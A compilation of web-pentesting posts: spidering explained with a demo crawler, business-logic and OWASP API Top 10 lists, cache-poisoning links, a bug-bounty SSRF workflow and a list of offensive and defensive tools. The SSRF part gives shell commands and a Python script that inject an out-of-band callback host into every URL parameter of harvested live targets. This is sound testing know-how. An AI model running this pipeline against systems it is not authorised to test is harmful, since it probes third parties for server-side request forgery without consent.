What is spidering?
* Spidering is the process of building a map of a website and identifying every page that any user could reach.
* How is it done?
* Active
* In active spidering the tool (Burp Suite, ZAP) clicks every link and button, fills in every form field, and keeps following each page it discovers.
* This can be dangerous: if the tool finds an administrator page and submits a button that deletes users or pages, that action really happens and will be treated as an attack. Keep automated crawling within scope and exclude destructive actions before starting it.
* Passive
* Passive spidering works like active spidering, but it does not request newly found pages itself; it only records the pages and links seen in the traffic you generate while browsing. It is therefore safer than active spidering.
* Spidering should be done before checking a web application for vulnerabilities, for several important reasons:
* Building the site map lets automated tools find every potentially vulnerable page.
* It also gives the pentester a better picture of the website.
* Spidering can also reveal pages that should not be available to ordinary users:
* administrator consoles, unfinished pages, or pages containing sensitive data.
* Spidering is one of the key stages of web application pentesting.
#WEB_APP #Pentesting #Spidering
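The active/passive distinction and the "do not click delete" caveat above, as an added example that is not part of the original post: a minimal in-scope spider. The site, host name (BASE) and destructive-action denylist (DENY_SUBSTRINGS) are constructed for the demo so it runs offline; a real run would replace fetch() with an HTTP client.

```python
# Added example, not from the original post: a minimal in-scope spider
# showing the active/passive distinction and the "do not click delete"
# caveat. The site below is constructed in memory so the script runs offline;
# BASE, SITE and DENY_SUBSTRINGS are assumptions for the demo.
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BASE = "https://target.example"  # assumed in-scope host

# Constructed sample site: "path[?query]" -> HTML body.
SITE = {
    "/": '<a href="/about">About</a> <a href="/admin">Admin</a> '
         '<a href="https://other.example/x">External</a>',
    "/about": '<a href="/">Home</a> '
              '<form action="/contact" method="post"><input name="msg"></form>',
    "/admin": '<a href="/admin/delete-user?id=7">Delete user 7</a> '
              '<a href="/logout">Logout</a>',
    "/admin/delete-user?id=7": "user 7 deleted",  # state-changing: never crawl
    "/logout": "bye",
    "/contact": "thanks",
}

# Links whose path or query contains one of these are recorded but never requested.
DENY_SUBSTRINGS = ("delete", "remove", "logout")


class LinkExtractor(HTMLParser):
    """Collect <a href> targets and <form> actions from one page."""

    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form" and a.get("action"):
            self.forms.append((a.get("method", "get").lower(), a["action"]))


def extract(page_url, html):
    p = LinkExtractor()
    p.feed(html)
    return ([urljoin(page_url, h) for h in p.links],
            [(m, urljoin(page_url, a)) for m, a in p.forms])


def in_scope(url):
    return urlsplit(url).netloc == urlsplit(BASE).netloc


def is_safe(url):
    s = urlsplit(url)
    target = (s.path + "?" + s.query).lower()
    return not any(word in target for word in DENY_SUBSTRINGS)


def fetch(url):
    """Stand-in for an HTTP GET against the constructed site."""
    s = urlsplit(url)
    return SITE.get(s.path + ("?" + s.query if s.query else ""), "")


def active_spider(start_path):
    """Request every in-scope, non-destructive link reachable from start_path.
    Forms are recorded for manual testing, never submitted automatically."""
    queue, seen = deque([urljoin(BASE, start_path)]), set()
    sitemap, skipped, forms = [], [], []
    while queue:
        url = queue.popleft()
        if url in seen or not in_scope(url):
            continue
        seen.add(url)
        if not is_safe(url):
            skipped.append(url)   # surfaced for the tester, not requested
            continue
        sitemap.append(url)
        links, page_forms = extract(url, fetch(url))
        forms.extend(page_forms)
        queue.extend(links)
    return sitemap, skipped, forms


def passive_spider(observed):
    """observed: (url, body) pairs captured from the tester's own browsing.
    Only parses responses already received; sends no requests of its own."""
    known = set()
    for url, body in observed:
        known.add(url)
        links, _ = extract(url, body)
        known.update(link for link in links if in_scope(link))
    return sorted(known)


if __name__ == "__main__":
    crawled, held_back, found_forms = active_spider("/")
    print("active: crawled", crawled)
    print("active: held back", held_back)
    print("active: forms", found_forms)
    print("passive:", passive_spider([(BASE + "/", SITE["/"])]))
```

The active run reaches /admin but holds back the delete-user and logout links instead of requesting them, and records the POST form rather than submitting it; the passive run only knows what was in the one response it was given.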
Top Business Logic Vulnerability in Web.pdf
👾 Business-logic vulnerabilities in web applications.
• Password reset broken logic;
• 2FA broken logic;
• Excessive trust in client-side controls;
• High-level logic vulnerability;
• Inconsistent security controls;
• Flawed enforcement of business rules;
• Low-level logic flaw;
• Inconsistent handling of exceptional input;
• Weak isolation on dual-use endpoint;
• Insufficient workflow validation;
• Authentication bypass via flawed state machine;
• Infinite money logic flaw;
• Authentication bypass via encryption oracle.
OWASP Top 10 API 2023.pdf
🔝 OWASP API Security Top 10 2023.
• API1:2023 - Broken Object Level Authorization;
• API2:2023 - Broken Authentication;
• API3:2023 - Broken Object Property Level Authorization;
• API4:2023 - Unrestricted Resource Consumption;
• API5:2023 - Broken Function Level Authorization;
• API6:2023 - Unrestricted Access to Sensitive Business Flows;
• API7:2023 - Server Side Request Forgery;
• API8:2023 - Security Misconfiguration;
• API9:2023 - Improper Inventory Management;
• API10:2023 - Unsafe Consumption of APIs.
Cache Poisoning and Cache Deception.pdf
References:
https://portswigger.net/web-security/web-cache-poisoning
https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
https://hackerone.com/reports/593712
https://youst.in/posts/cache-poisoning-at-scale/
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
💰 Bug Bounty Tips for SSRF 💰
#BugBounty #Pentesting
Step 1: Subdomain Enumeration
* DNS Dumpster
* Sublist3r
* Amass
* Certificate Transparency Logs
* subdomainer
Step 2: Find Live Hosts
cat all-domains.txt | httpx > all-live.txt
Step 3: Collect All Known URLs (archived URLs via gauplus; static file extensions are excluded)
cat all-live.txt | gauplus -subs -b png,jpg,jpeg,gif,swf,woff,svg -o allUrls.txt
Step 4: Inject a Burp Collaborator URL into every parameter value
Keep only URLs that have a query string and let qsreplace substitute each value with your Collaborator payload (the hostname below is the post's example; use your own):
cat allUrls.txt | grep "=" | qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Send the requests and watch for out-of-band interactions
cat ssrf.txt | httpx -fr
(-fr follows redirects; a DNS or HTTP interaction in the Collaborator client means some URL in ssrf.txt made the server reach out to you.)
Step 6: Find which URL is vulnerable
Split ssrf.txt into small batches and replay them one batch at a time until you find the one that triggers the interaction:
split -l 10 ssrf.txt output_file_
#BugBounty #Pentesting
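Steps 4 and 6 above, as an added example that is not part of the original post: instead of one shared Collaborator host and file splitting, each query parameter gets its own canary subdomain, so a single interaction in the out-of-band log names the exact URL and parameter. OOB_DOMAIN and the sample URLs are assumptions standing in for your Collaborator domain and allUrls.txt.

```python
# Added example, not from the original post: steps 4 and 6 done with a
# per-parameter canary instead of one shared Collaborator host and file
# splitting. Every query value is replaced with a unique subdomain of an
# out-of-band domain, so a DNS or HTTP interaction on that subdomain names
# the exact URL and parameter. OOB_DOMAIN and the sample URLs are assumptions.
import hashlib
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

OOB_DOMAIN = "example-oob.test"  # assumed placeholder for your Collaborator domain


def tag_for(url, param):
    """Short, stable label for a (url, parameter) pair; becomes the canary's subdomain."""
    return hashlib.sha256(f"{url}\x00{param}".encode()).hexdigest()[:12]


def canary_urls(urls, oob_domain=OOB_DOMAIN):
    """Return ([(tag, mutated_url), ...], {tag: (url, param)}).

    One parameter is replaced per request so a hit is attributable to that
    parameter; URLs without a query string are dropped, like the grep "=" step.
    The payload carries an http:// scheme because many SSRF sinks require one.
    """
    out, index = [], {}
    for url in urls:
        parts = urlsplit(url)
        params = parse_qsl(parts.query, keep_blank_values=True)
        if not params:
            continue
        for i, (name, _) in enumerate(params):
            tag = tag_for(url, name)
            index[tag] = (url, name)
            mutated = list(params)
            mutated[i] = (name, f"http://{tag}.{oob_domain}/")
            out.append((tag, urlunsplit(parts._replace(query=urlencode(mutated)))))
    return out, index


def attribute_hit(hostname, index):
    """Map an interaction hostname seen in the OOB server log back to (url, param)."""
    return index.get(hostname.split(".")[0])


if __name__ == "__main__":
    # Constructed sample input standing in for allUrls.txt.
    sample = [
        "https://target.example/fetch?url=x&size=1",
        "https://target.example/static/logo.png",
    ]
    targets, lookup = canary_urls(sample)
    for tag, url in targets:
        print(url)  # feed these to httpx, as in step 5
    # Constructed: a hostname as it would appear in the OOB interaction log.
    print(attribute_hit(f"{targets[0][0]}.{OOB_DOMAIN}", lookup))
```

Write the mutated URLs to a file and send them with httpx as in step 5; when an interaction appears, pass its hostname to attribute_hit() to get the offending URL and parameter without any replaying.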
💥 Cybersecurity Tools By Category
Information Gathering:
>Nmap
>Shodan
>Maltego
>theHarvester
>Recon-ng
>Amass
>Censys
>OSINT Framework
>Gobuster
Exploitation:
>Burp Suite
>Metasploit Framework
>sqlmap
>OWASP ZAP
>Exploit-DB
>Core Impact
>Cobalt Strike
Password Cracking:
>John the Ripper
>THC-Hydra
>Hashcat
>Ophcrack
>Medusa
>Cain & Abel
Vulnerability Scanning:
>OpenVAS
>Nessus
>AppScan
>Lynis
>Retina
>Nexpose
Social Engineering:
>GoPhish
>HiddenEye
>SocialFish
>EvilURL
>Evilginx
Forensics:
>The Sleuth Kit
>Autopsy
>Volatility
>Guymager
>Foremost
>Binwalk
>Wireshark
Wireless Hacking:
>Aircrack-ng
>Wifite
>Kismet
>tcpdump
>AirSnort
>NetStumbler
>Reaver
Web Application Assessment:
>OWASP ZAP
>Burp Suite
>Nikto
>WPScan
>Gobuster
>AppSpider